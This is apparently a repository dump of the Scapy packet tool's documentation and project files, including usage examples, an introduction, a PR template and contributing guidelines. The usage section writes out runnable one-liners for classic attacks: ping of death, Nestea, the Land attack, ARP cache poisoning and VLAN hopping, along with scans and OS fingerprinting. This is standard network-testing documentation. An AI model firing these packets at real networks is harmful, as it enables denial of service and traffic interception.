first pseudo-layer (in the example ``RadioTap()``) by ``PrismHeader()``, or by a proprietary pseudo-layer, or even to remove it.\n\n\nSimple one-liners\n=================\n\n\nACK Scan\n--------\n\nUsing Scapy's powerful packet crafting facilities we can quick replicate classic TCP Scans.\nFor example, the following string will be sent to simulate an ACK Scan::\n\n >>> ans, unans = sr(IP(dst=\"www.slashdot.org\")/TCP(dport=[80,666],flags=\"A\"))\n\nWe can find unfiltered ports in answered packets::\n\n >>> for s,r in ans:\n ... if s[TCP].dport == r[TCP].sport:\n ... print(\"%d is unfiltered\" % s[TCP].dport)\n\nSimilarly, filtered ports can be found with unanswered packets::\n\n >>> for s in unans: \n ... print(\"%d is filtered\" % s[TCP].dport)\n\n\nXmas Scan\n---------\n\nXmas Scan can be launched using the following command::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1\")/TCP(dport=666,flags=\"FPU\") )\n\nChecking RST responses will reveal closed ports on the target. \n\nIP Scan\n-------\n\nA lower level IP Scan can be used to enumerate supported protocols::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1\",proto=(0,255))/\"SCAPY\",retry=2)\n\n\nARP Ping\n--------\n\nThe fastest way to discover hosts on a local ethernet network is to use the ARP Ping method::\n\n >>> ans, unans = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=\"192.168.1.0/24\"),timeout=2)\n\nAnswers can be reviewed with the following command::\n\n >>> ans.summary(lambda (s,r): r.sprintf(\"%Ether.src% %ARP.psrc%\") )\n\nScapy also includes a built-in arping() function which performs similar to the above two commands:\n\n >>> arping(\"192.168.1.*\")\n\n\nICMP Ping\n---------\n\nClassical ICMP Ping can be emulated using the following command::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1-254\")/ICMP())\n\nInformation on live hosts can be collected with the following request::\n\n >>> ans.summary(lambda (s,r): r.sprintf(\"%IP.src% is alive\") )\n\n\nTCP Ping\n--------\n\nIn cases where ICMP echo requests are blocked, we can still use various TCP Pings such as TCP SYN Ping below::\n\n >>> ans, unans = sr( IP(dst=\"192.168.1.*\")/TCP(dport=80,flags=\"S\") )\n\nAny response to our probes will indicate a live host. We can collect results with the following command::\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src% is alive\") )\n\n\nUDP Ping\n--------\n\nIf all else fails there is always UDP Ping which will produce ICMP Port unreachable errors from live hosts. Here you can pick any port which is most likely to be closed, such as port 0::\n\n >>> ans, unans = sr( IP(dst=\"192.168.*.1-10\")/UDP(dport=0) )\n\nOnce again, results can be collected with this command:\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src% is alive\") )\n\n\n\nClassical attacks\n-----------------\n\nMalformed packets::\n\n >>> send(IP(dst=\"10.1.1.5\", ihl=2, version=3)/ICMP()) \n\nPing of death (Muuahahah)::\n\n >>> send( fragment(IP(dst=\"10.0.0.5\")/ICMP()/(\"X\"*60000)) ) \n\nNestea attack::\n\n >>> send(IP(dst=target, id=42, flags=\"MF\")/UDP()/(\"X\"*10)) \n >>> send(IP(dst=target, id=42, frag=48)/(\"X\"*116)) \n >>> send(IP(dst=target, id=42, flags=\"MF\")/UDP()/(\"X\"*224)) \n \nLand attack (designed for Microsoft Windows)::\n\n >>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))\n\nARP cache poisoning \n------------------- \nThis attack prevents a client from joining the gateway by poisoning \nits ARP cache through a VLAN hopping attack. \n\nClassic ARP cache poisoning::\n\n >>> send( Ether(dst=clientMAC)/ARP(op=\"who-has\", psrc=gateway, pdst=client), \n inter=RandNum(10,40), loop=1 ) \n\nARP cache poisoning with double 802.1q encapsulation::\n \n >>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) \n /ARP(op=\"who-has\", psrc=gateway, pdst=client),\n inter=RandNum(10,40), loop=1 )\n\nTCP Port Scanning \n-----------------\n \nSend a TCP SYN on each port. Wait for a SYN-ACK or a RST or an ICMP error:: \n\n >>> res, unans = sr( IP(dst=\"target\") \n /TCP(flags=\"S\", dport=(1,1024)) ) \n\nPossible result visualization: open ports\n\n::\n\n >>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )\n \n \nIKE Scanning\n------------\n\nWe try to identify VPN concentrators by sending ISAKMP Security Association proposals\nand receiving the answers::\n\n >>> res, unans = sr( IP(dst=\"192.168.1.*\")/UDP()\n /ISAKMP(init_cookie=RandString(8), exch_type=\"identity prot.\") \n /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) \n ) \n\nVisualizing the results in a list::\n\n >>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) ) \n \n \n\nAdvanced traceroute\n-------------------\n\nTCP SYN traceroute\n^^^^^^^^^^^^^^^^^^\n\n::\n\n >>> ans, unans = sr(IP(dst=\"4.2.2.1\",ttl=(1,10))/TCP(dport=53,flags=\"S\"))\n\nResults would be::\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src%\\t{ICMP:%ICMP.type%}\\t{TCP:%TCP.flags%}\"))\n 192.168.1.1 time-exceeded\n 68.86.90.162 time-exceeded\n 4.79.43.134 time-exceeded\n 4.79.43.133 time-exceeded\n 4.68.18.126 time-exceeded\n 4.68.123.38 time-exceeded\n 4.2.2.1 SA\n\n\nUDP traceroute\n^^^^^^^^^^^^^^\n\nTracerouting an UDP application like we do with TCP is not \nreliable, because there's no handshake. We need to give an applicative payload (DNS, ISAKMP, \nNTP, etc.) to deserve an answer::\n\n >>> res, unans = sr(IP(dst=\"target\", ttl=(1,20))\n /UDP()/DNS(qd=DNSQR(qname=\"test.com\")) \n\nWe can visualize the results as a list of routers::\n\n >>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src)) \n\n\nDNS traceroute\n^^^^^^^^^^^^^^\n\nWe can perform a DNS traceroute by specifying a complete packet in ``l4`` parameter of ``traceroute()`` function::\n\n >>> ans, unans = traceroute(\"4.2.2.1\",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname=\"thesprawl.org\")))\n Begin emission:\n ..*....******...******.***...****Finished to send 30 packets.\n *****...***...............................\n Received 75 packets, got 28 answers, remaining 2 packets\n 4.2.2.1:udp53 \n 1 192.168.1.1 11 \n 4 68.86.90.162 11 \n 5 4.79.43.134 11 \n 6 4.79.43.133 11 \n 7 4.68.18.62 11 \n 8 4.68.123.6 11 \n 9 4.2.2.1 \n ...\n\n\nEtherleaking \n------------\n\n::\n\n >>> sr1(IP(dst=\"172.16.1.232\")/ICMP()) \n <IP src=172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]| \n <Padding load=’0O\\x02\\x01\\x00\\x04\\x06public\\xa2B\\x02\\x02\\x1e’ |>>> \n\nICMP leaking\n------------ \n\nThis was a Linux 2.0 bug:: \n\n >>> sr1(IP(dst=\"172.16.1.1\", options=\"\\x02\")/ICMP()) \n <IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] | \n <IPerror src=172.16.1.24 options=’\\x02\\x00\\x00\\x00’ [...] | \n <ICMPerror code=0 type=8 id=0x0 seq=0x0 chksum=0xf7ff | \n <Padding load=’\\x00[...]\\x00\\x1d.\\x00V\\x1f\\xaf\\xd9\\xd4;\\xca’ |>>>>> \n\n\nVLAN hopping \n------------\n\nIn very specific conditions, a double 802.1q encapsulation will \nmake a packet jump to another VLAN::\n \n >>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst=target)/ICMP()) \n\n\nWireless sniffing\n-----------------\n\nThe following command will display information similar to most wireless sniffers::\n\n>>> sniff(iface=\"ath0\",prn=lambda x:x.sprintf(\"{Dot11Beacon:%Dot11.addr3%\\t%Dot11Beacon.info%\\t%PrismHeader.channel%\\t%Dot11Beacon.cap%}\"))\n\nThe above command will produce output similar to the one below::\n\n 00:00:00:01:02:03 netgear 6L ESS+privacy+PBCC\n 11:22:33:44:55:66 wireless_100 6L short-slot+ESS+privacy\n 44:55:66:00:11:22 linksys 6L short-slot+ESS+privacy\n 12:34:56:78:90:12 NETGEAR 6L short-slot+ESS+privacy+short-preamble\n\n\nRecipes \n=======\n\nSimplistic ARP Monitor\n----------------------\n\nThis program uses the ``sniff()`` callback (parameter prn). The store parameter is set to 0 so that the ``sniff()`` function will not store anything (as it would do otherwise) and thus can run forever. The filter parameter is used for better performances on high load : the filter is applied inside the kernel and Scapy will only see ARP traffic.\n\n::\n\n #! /usr/bin/env python\n from scapy.all import *\n \n def arp_monitor_callback(pkt):\n if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at\n return pkt.sprintf(\"%ARP.hwsrc% %ARP.psrc%\")\n \n sniff(prn=arp_monitor_callback, filter=\"arp\", store=0)\n\nIdentifying rogue DHCP servers on your LAN \n-------------------------------------------\n\n.. index::\n single: DHCP\n\nProblem\n^^^^^^^\n\nYou suspect that someone has installed an additional, unauthorized DHCP server on your LAN -- either unintentionally or maliciously. \nThus you want to check for any active DHCP servers and identify their IP and MAC addresses. \n\nSolution\n^^^^^^^^\n\nUse Scapy to send a DHCP discover request and analyze the replies::\n\n >>> conf.checkIPaddr = False\n >>> fam,hw = get_if_raw_hwaddr(conf.iface)\n >>> dhcp_discover = Ether(dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=\"0.0.0.0\",dst=\"255.255.255.255\")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[(\"message-type\",\"discover\"),\"end\"])\n >>> ans, unans = srp(dhcp_discover, multi=True) # Press CTRL-C after several seconds\n Begin emission:\n Finished to send 1 packets.\n .*...*..\n Received 8 packets, got 2 answers, remaining 0 packets\n\nIn this case we got 2 replies, so there were two active DHCP servers on the test network::\n\n >>> ans.summary()\n Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.255:bootpc / BOOTP / DHCP\n Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.255:bootpc / BOOTP / DHCP\n }}}\n We are only interested in the MAC and IP addresses of the replies: \n {{{\n >>> for p in ans: print p[1][Ether].src, p[1][IP].src\n ...\n 00:de:ad:be:ef:00 192.168.1.1\n 00:11:11:22:22:33 192.168.1.11\n\nDiscussion\n^^^^^^^^^^\n\nWe specify ``multi=True`` to make Scapy wait for more answer packets after the first response is received.\nThis is also the reason why we can't use the more convenient ``dhcp_request()`` function and have to construct the DCHP packet manually: ``dhcp_request()`` uses ``srp1()`` for sending and receiving and thus would immediately return after the first answer packet. \n\nMoreover, Scapy normally makes sure that replies come from the same IP address the stimulus was sent to. But our DHCP packet is sent to the IP broadcast address (255.255.255.255) and any answer packet will have the IP address of the replying DHCP server as its source IP address (e.g. 192.168.1.1). Because these IP addresses don't match, we have to disable Scapy's check with ``conf.checkIPaddr = False`` before sending the stimulus. \n\nSee also\n^^^^^^^^\n\nhttp://en.wikipedia.org/wiki/Rogue_DHCP\n\n\n\nFirewalking \n-----------\n\nTTL decrementation after a filtering operation \nonly not filtered packets generate an ICMP TTL exceeded \n\n >>> ans, unans = sr(IP(dst=\"172.16.4.27\", ttl=16)/TCP(dport=(1,1024))) \n >>> for s,r in ans: \n if r.haslayer(ICMP) and r.payload.type == 11: \n print s.dport \n\nFind subnets on a multi-NIC firewall \nonly his own NIC’s IP are reachable with this TTL:: \n\n >>> ans, unans = sr(IP(dst=\"172.16.5/24\", ttl=15)/TCP()) \n >>> for i in unans: print i.dst\n\n\nTCP Timestamp Filtering\n------------------------\n\nProblem\n^^^^^^^\n\nMany firewalls include a rule to drop TCP packets that do not have TCP Timestamp option set which is a common occurrence in popular port scanners.\n\nSolution\n^^^^^^^^\n\nTo allow Scapy to reach target destination additional options must be used::\n\n >>> sr1(IP(dst=\"72.14.207.99\")/TCP(dport=80,flags=\"S\",options=[('Timestamp',(0,0))]))\n\n\n\nViewing packets with Wireshark\n------------------------------\n\n.. index::\n single: wireshark()\n\nProblem\n^^^^^^^\n\nYou have generated or sniffed some packets with Scapy and want to view them with `Wireshark <http://www.wireshark.org>`_, because of its advanced packet dissection abilities.\n\nSolution\n^^^^^^^^\n\nThat's what the ``wireshark()`` function is for:\n\n >>> packets = Ether()/IP(dst=Net(\"google.com/30\"))/ICMP() # first generate some packets\n >>> wireshark(packets) # show them with Wireshark\n\nWireshark will start in the background and show your packets.\n \nDiscussion\n^^^^^^^^^^\n\nThe ``wireshark()`` function generates a temporary pcap-file containing your packets, starts Wireshark in the background and makes it read the file on startup. \n\nPlease remember that Wireshark works with Layer 2 packets (usually called \"frames\"). So we had to add an ``Ether()`` header to our ICMP packets. Passing just IP packets (layer 3) to Wireshark will give strange results.\n\nYou can tell Scapy where to find the Wireshark executable by changing the ``conf.prog.wireshark`` configuration setting.\n\n\n\nOS Fingerprinting\n-----------------\n\nISN\n^^^\n\nScapy can be used to analyze ISN (Initial Sequence Number) increments to possibly discover vulnerable systems. First we will collect target responses by sending a number of SYN probes in a loop::\n\n >>> ans, unans = srloop(IP(dst=\"192.168.1.1\")/TCP(dport=80,flags=\"S\"))\n\nOnce we obtain a reasonable number of responses we can start analyzing collected data with something like this:\n\n >>> temp = 0\n >>> for s, r in ans:\n ... temp = r[TCP].seq - temp\n ... print(\"%d\\t+%d\" % (r[TCP].seq, temp))\n ... \n 4278709328 +4275758673\n 4279655607 +3896934\n 4280642461 +4276745527\n 4281648240 +4902713\n 4282645099 +4277742386\n 4283643696 +5901310\n\nnmap_fp\n^^^^^^^\n\nNmap fingerprinting (the old \"1st generation\" one that was done by Nmap up to v4.20) is supported in Scapy. In Scapy v2 you have to load an extension module first::\n\n >>> load_module(\"nmap\")\n\nIf you have Nmap installed you can use it's active os fingerprinting database with Scapy. Make sure that version 1 of signature database is located in the path specified by::\n\n >>> conf.nmap_base\n\nThen you can use the ``nmap_fp()`` function which implements same probes as in Nmap's OS Detection engine::\n\n >>> nmap_fp(\"192.168.1.1\",oport=443,cport=1)\n Begin emission:\n .****..**Finished to send 8 packets.\n *................................................\n Received 58 packets, got 7 answers, remaining 1 packets\n (1.0, ['Linux 2.4.0 - 2.5.20', 'Linux 2.4.19 w/grsecurity patch', \n 'Linux 2.4.20 - 2.4.22 w/grsecurity.org patch', 'Linux 2.4.22-ck2 (x86)\n w/grsecurity.org and HZ=1000 patches', 'Linux 2.4.7 - 2.6.11'])\n\np0f\n^^^\n\nIf you have p0f installed on your system, you can use it to guess OS name and version right from Scapy (only SYN database is used). First make sure that p0f database exists in the path specified by::\n\n >>> conf.p0f_base\n\nFor example to guess OS from a single captured packet:\n\n >>> sniff(prn=prnp0f)\n 192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs)\n -> 74.125.19.104:www (distance 0)\n <Sniffed: TCP:339 UDP:2 ICMP:0 Other:156>\n\n\n\n" }, { "alpha_fraction": 0.7180855870246887, "alphanum_fraction": 0.7307518124580383, "avg_line_length": 51.85646057128906, "blob_id": "c365f6dab4e112eb23bf1daa3be930c496570e25", "content_id": "20b64379fd80088e25c245c53657f6766e7c2a6f", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 11059, "license_type": "permissive", "max_line_length": 646, "num_lines": 209, "path": "/scapy/doc/scapy/introduction.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "************\nIntroduction\n************\n\n.. sectionauthor:: Philippe Biondi <phil at secdev.org>\n\nAbout Scapy\n===========\nScapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.\n\nIn other words, Scapy is a powerful interactive packet manipulation program. \nIt is able to forge or decode packets of a wide number of protocols,\nsend them on the wire, capture them, match requests and replies, and \nmuch more. Scapy can easily handle most classical tasks like scanning,\ntracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark). \n\n.. image:: graphics/testing-taxonomy.*\n :scale: 50\n \nScapy also performs very well on a lot of other\nspecific tasks that most other tools can't handle, like sending invalid frames,\ninjecting your own 802.11 frames, combining techniques \n(VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. \n\nThe idea is simple. Scapy mainly does two things: sending packets and receiving answers. You define a set of packets, it sends them, receives answers, matches requests with answers and returns a list of packet couples (request, answer) and a list of unmatched packets. This has the big advantage over tools like Nmap or hping that an answer is not reduced to (open/closed/filtered), but is the whole packet.\n\nOn top of this can be build more high level functions, for example, one that does traceroutes and give as a result only the start TTL of the request and the source IP of the answer. One that pings a whole network and gives the list of machines answering. One that does a portscan and returns a LaTeX report.\n\n\nWhat makes Scapy so special\n===========================\n\nFirst, with most other networking tools, you won't build something the author did not imagine. These tools have been built for a specific goal and can't deviate much from it. For example, an ARP cache poisoning program won't let you use double 802.1q encapsulation. Or try to find a program that can send, say, an ICMP packet with padding (I said *padding*, not *payload*, see?). In fact, each time you have a new need, you have to build a new tool.\n\nSecond, they usually confuse decoding and interpreting. Machines are good at decoding and can help human beings with that. Interpretation is reserved for human beings. Some programs try to mimic this behavior. For instance they say \"*this port is open*\" instead of \"*I received a SYN-ACK*\". Sometimes they are right. Sometimes not. It's easier for beginners, but when you know what you're doing, you keep on trying to deduce what really happened from the program's interpretation to make your own, which is hard because you lost a big amount of information. And you often end up using ``tcpdump -xX`` to decode and interpret what the tool missed.\n\nThird, even programs which only decode do not give you all the information they received. The network's vision they give you is the one their author thought was sufficient. But it is not complete, and you have a bias. For instance, do you know a tool that reports the Ethernet padding?\n\nScapy tries to overcome those problems. It enables you to build exactly the packets you want. Even if I think stacking a 802.1q layer on top of TCP has no sense, it may have some for somebody else working on some product I don't know. Scapy has a flexible model that tries to avoid such arbitrary limits. You're free to put any value you want in any field you want and stack them like you want. You're an adult after all.\n\nIn fact, it's like building a new tool each time, but instead of dealing with a hundred line C program, you only write 2 lines of Scapy.\n\nAfter a probe (scan, traceroute, etc.) Scapy always gives you the full decoded packets from the probe, before any interpretation. That means that you can probe once and interpret many times, ask for a traceroute and look at the padding for instance.\n\nFast packet design\n------------------\n\nOther tools stick to the **program-that-you-run-from-a-shell** paradigm.\nThe result is an awful syntax to describe a packet. For these tools, the \nsolution adopted uses a higher but less powerful description, in the form of \nscenarios imagined by the tool's author. As an example, only the IP address must \nbe given to a port scanner to trigger the **port scanning** scenario. Even\nif the scenario is tweaked a bit, you still are stuck to a port scan.\n\nScapy's paradigm is to propose a Domain Specific Language (DSL) that \nenables a powerful and fast description of any kind of packet. Using the Python \nsyntax and a Python interpreter as the DSL syntax and interpreter has many \nadvantages: there is no need to write a separate interpreter, users don't need \nto learn yet another language and they benefit from a complete, concise \nand very powerful language.\n\nScapy enables the user to describe a packet or set of packets as layers that are\nstacked one upon another. Fields of each layer have useful default values that \ncan be overloaded. Scapy does not oblige the user to use predetermined methods \nor templates. This alleviates the requirement of writing a new tool each time a \ndifferent scenario is required. In C, it may take an average of 60 lines to \ndescribe a packet. With Scapy, the packets to be sent may be described in only a\nsingle line with another line to print the result. 90\\% of the network probing \ntools can be rewritten in 2 lines of Scapy.\n\nProbe once, interpret many\n--------------------------\n\nNetwork discovery is blackbox testing. When probing a network, many stimuli are \nsent while only a few of them are answered. If the right stimuli are \nchosen, the desired information may be obtained by the responses or the lack of \nresponses. Unlike many tools, Scapy gives all the information, i.e. all the \nstimuli sent and all the responses received. Examination of this data will give \nthe user the desired information. When the dataset is small, the user can just \ndig for it. In other cases, the interpretation of the data will depend on the \npoint of view taken. Most tools choose the viewpoint and discard all the data \nnot related to that point of view. Because Scapy gives the complete raw data, \nthat data may be used many times allowing the viewpoint to evolve during \nanalysis. For example, a TCP port scan may be probed and the data visualized as \nthe result of the port scan. The data could then also be visualized with respect\nto the TTL of response packet. A new probe need not be initiated to adjust the \nviewpoint of the data.\n\n.. image:: graphics/scapy-concept.*\n :scale: 80\n\nScapy decodes, it does not interpret\n------------------------------------\n\nA common problem with network probing tools is they try to interpret the answers\nreceived instead of only decoding and giving facts. Reporting something like \n**Received a TCP Reset on port 80** is not subject to interpretation errors. \nReporting **Port 80 is closed** is an interpretation that may be right most \nof the time but wrong in some specific contexts the tool's author did not \nimagine. For instance, some scanners tend to report a filtered TCP port when \nthey receive an ICMP destination unreachable packet. This may be right, but in \nsome cases, it means the packet was not filtered by the firewall but rather there\nwas no host to forward the packet to.\n\nInterpreting results can help users that don't know what a port scan is but \nit can also make more harm than good, as it injects bias into the results. What \ncan tend to happen is that so that they can do the interpretation themselves, \nknowledgeable users will try to reverse engineer the tool's interpretation to \nderive the facts that triggered that interpretation. Unfortunately, much \ninformation is lost in this operation.\n\n\n\n\nQuick demo\n==========\n\nFirst, we play a bit and create four IP packets at once. Let's see how it works. We first instantiate the IP class. Then, we instantiate it again and we provide a destination that is worth four IP addresses (/30 gives the netmask). Using a Python idiom, we develop this implicit packet in a set of explicit packets. Then, we quit the interpreter. As we provided a session file, the variables we were working on are saved, then reloaded:: \n\n # ./run_scapy -s mysession\n New session [mysession]\n Welcome to Scapy (2.4.0)\n >>> IP()\n <IP |>\n >>> target=\"www.target.com/30\"\n >>> ip=IP(dst=target)\n >>> ip\n <IP dst=<Net www.target.com/30> |>\n >>> [p for p in ip]\n [<IP dst=207.171.175.28 |>, <IP dst=207.171.175.29 |>, \n <IP dst=207.171.175.30 |>, <IP dst=207.171.175.31 |>]\n >>> ^D\n \n::\n \n # ./run_scapy -s mysession\n Using session [mysession]\n Welcome to Scapy (2.4.0)\n >>> ip\n <IP dst=<Net www.target.com/30> |>\n\nNow, let's manipulate some packets::\n\n >>> IP()\n <IP |>\n >>> a=IP(dst=\"172.16.1.40\")\n >>> a\n <IP dst=172.16.1.40 |>\n >>> a.dst\n '172.16.1.40'\n >>> a.ttl\n 64\n \nLet's say I want a broadcast MAC address, and IP payload to ketchup.com \nand to mayo.com, TTL value from 1 to 9, and an UDP payload::\n \n >>> Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n /IP(dst=[\"ketchup.com\",\"mayo.com\"],ttl=(1,9)) \n /UDP() \n\nWe have 18 packets defined in 1 line (1 implicit packet) \n\nSensible default values\n-----------------------\n\nScapy tries to use sensible default values for all packet fields.\nIf not overridden,\n\n* IP source is chosen according to destination and routing table \n* Checksum is computed \n* Source MAC is chosen according to the output interface \n* Ethernet type and IP protocol are determined by the upper layer \n\n.. image:: graphics/default-values-ip.png\n :scale: 60\n\nOther fields’ default values are chosen to be the most useful ones: \n\n* TCP source port is 20, destination port is 80. \n* UDP source and destination ports are 53. \n* ICMP type is echo request. \n\n\nLearning Python\n===============\n\nScapy uses the Python interpreter as a command board. That means that you can directly use the Python language (assign variables, use loops, define functions, etc.)\n\nIf you are new to Python and you really don't understand a word because of that, or if you want to learn this language, take an hour to read the very good `Python tutorial <http://docs.python.org/tutorial/>`_ by Guido Van Rossum. After that, you'll know Python :) (really!). For a more in-depth tutorial `Dive Into Python <http://diveintopython.org/>`_ is a very good start too.\n\nFor a quick start, here's an overview of Python's data types:\n\n* ``int`` (signed, 32bits) : ``42`` \n* ``long`` (signed, infinite): ``42L`` \n* ``str`` : ``\"bell\\x07\\n\"`` or ``’bell\\x07\\n’`` \n\n* ``tuple`` (immutable): ``(1,4,\"42\")`` \n* ``list`` (mutable): ``[4,2,\"1\"]`` \n* ``dict`` (mutable): ``{ \"one\":1 , \"two\":2 }``\n\nThere are no block delimiters in Python. Instead, indentation does matter::\n\n if cond:\n instr\n instr\n elif cond2:\n instr\n else:\n instr\n \n\n" }, { "alpha_fraction": 0.7367088794708252, "alphanum_fraction": 0.7417721748352051, "avg_line_length": 40.578948974609375, "blob_id": "cd5fff8451dd25be0638a6b1d95346bb22931d83", "content_id": "87e44944aba5c88af4689d247cf9ba917a76e0b9", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 790, "license_type": "permissive", "max_line_length": 143, "num_lines": 19, "path": "/scapy/.github/PULL_REQUEST_TEMPLATE.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "This is just a checklist to guide you. You can remove it safely.\n\n\n[ ] If you are new to Scapy: I have checked https://github.com/secdev/scapy/blob/master/CONTRIBUTING.md (esp. section submitting-pull-requests)\n\n[ ] I squashed commits belonging together\n\n[ ] I added unit tests or explained why they are not relevant\n\n[ ] I executed the regression tests for Python2 and Python3 (using `tox` or, `cd test && ./run_tests_py2, cd test && ./run_tests_py3`)\n\n\n< brief description what this PR will do, e.g. fixes broken dissection of XXX >\n\n< if required - short explanation why you fixed something in a way that may look more complicated as it actually is >\n\n< if required - outline impacts on other parts of the library >\n\nfixes #< add issue number here if appropriate, else remove this line>\n" }, { "alpha_fraction": 0.6187845468521118, "alphanum_fraction": 0.6243094205856323, "avg_line_length": 21.625, "blob_id": "23b827e41de4f8531c077ec9dd946d01a6330216", "content_id": "ed3c1eeba166ca59d6d1f3e0025cd78a7e1340d1", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 362, "license_type": "permissive", "max_line_length": 35, "num_lines": 16, "path": "/scapy/.coveragerc", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "[run]\nomit =\n # Travis specific path\n /home/travis/virtualenv/python*\n # Python specific path\n /usr/local/lib/python2.7/*\n # Scapy specific paths & files\n test/*\n bin/*\n scapy/tools/*\n */travis_test_client.py\n */travis_test_server.py\n */tools/UTscapy.py\n # Libraries\n */scapy/modules/six.py\n */scapy/modules/winpcapy.py\n" }, { "alpha_fraction": 0.7532950043678284, "alphanum_fraction": 0.7566745281219482, "avg_line_length": 39.53424835205078, "blob_id": "fbe88dc804566b143f4f69a692512574e191585d", "content_id": "85eb715ffdef68ba8034d363764c9602b662f6ef", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5918, "license_type": "permissive", "max_line_length": 179, "num_lines": 146, "path": "/scapy/CONTRIBUTING.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# How to contribute\n\nContributors are essential to Scapy (as they are to most open source\nprojects). Here is some advice to help you help the project!\n\n## Project objectives\n\nWe try to keep Scapy as powerful as possible, to support as many\nprotocols and platforms as possible, to keep and make the code (and\nthe commit history) as clean as possible.\n\nSince Scapy can be slow and memory consuming, we try to limit CPU and\nmemory usage, particularly in parts of the code often called.\n\n## What to contribute?\n\nYou want to spend time working on Scapy but have no (or little)\nidea what to do? You can look for open issues\n[labeled \"contributions wanted\"](https://github.com/secdev/scapy/labels/contributions%20wanted), or look at the [contributions roadmap](https://github.com/secdev/scapy/issues/399)\n\nIf you have any ideas of useful contributions that you cannot (or do\nnot want to) do yourself, open an issue and use the label\n\"contributions wanted\".\n\nOnce you have chosen a contribution, open an issue to let other people\nknow you're working on it (or assign the existing issue to yourself)\nand track your progress. You might want to ask whether you're working\nin an appropriate direction, to avoid the frustration of seeing your\ncontribution rejected after a lot of work.\n\n## Reporting issues\n\n### Questions\n\nIt is OK so submit issues to ask questions (more than OK,\nencouraged). There is a label \"question\" that you can use for that.\n\n### Bugs\n\nIf you have installed Scapy through a package manager (from your Linux\nor BSD system, from PyPI, etc.), please get and install the current\ndevelopment code, and check that the bug still exists before\nsubmitting an issue.\n\nPlease label your issues \"bug\".\n\nIf you're not sure whether a behavior is a bug or not, submit an issue\nand ask, don't be shy!\n\n### Enhancements / feature requests\n\nIf you want a feature in Scapy, but cannot implement it yourself or\nwant some hints on how to do that, open an issue with label\n\"enhancement\".\n\nExplain if possible the API you would like to have (e.g., give examples\nof function calls, packet creations, etc.).\n\n## Submitting pull requests\n\n### Coding style & conventions\n\nFirst, Scapy \"legacy\" code contains a lot of code that do not comply\nwith the following recommendations, but we try to comply with some\nguidelines for new code.\n\n - The code should be PEP-8 compliant; you can check your code with\n [pep8](https://pypi.python.org/pypi/pep8).\n - [Pylint](http://www.pylint.org/) can help you write good Python\n code (even if respecting Pylint rules is sometimes either too hard\n or even undesirable; human brain needed!).\n - [Google Python Style Guide](https://google.github.io/styleguide/pyguide.html)\n is a nice read!\n - Avoid creating unnecessary `list` objects, particularly if they\n can be huge (e.g., when possible, use `scapy.modules.six.range()` instead of\n `range()`, `for line in fdesc` instead of `for line in\n fdesc.readlines()`; more generally prefer generators over lists).\n\n### Tests\n\nPlease consider adding tests for your new features or that trigger the\nbug you are fixing. This will prevent a regression from being\nunnoticed. Do not use the variable `_` in your tests, as it could break them.\n\nIf you find yourself in a situation where your tests locally succeed but \nfail if executed on the CI, try to enable the debuging option for the \ndissector by setting `conf.debug_dissector = 1`.\n\n### New protocols\n\nNew protocols can go either in `scapy/layers` or to\n`scapy/contrib`. Protocols in `scapy/layers` should be usually found\non common networks, while protocols in `scapy/contrib` should be\nuncommon or specific.\n\n### Features\n\nProtocol-related features should be implemented within the same module\nas the protocol layers(s) (e.g., `traceroute()` is implemented in\n`scapy/layers/inet.py`).\n\nOther features may be implemented in a module (`scapy/modules`) or a\ncontribution (`scapy/contrib`).\n\n### Core\n\nIf you contribute to Scapy's core (e.g., `scapy/base_classes.py`,\n`scapy/packet.py`, etc.), please be very careful with performances and\nmemory footprint, as it is easy to write Python code that wastes\nmemory or CPU cycles.\n\nAs an example, 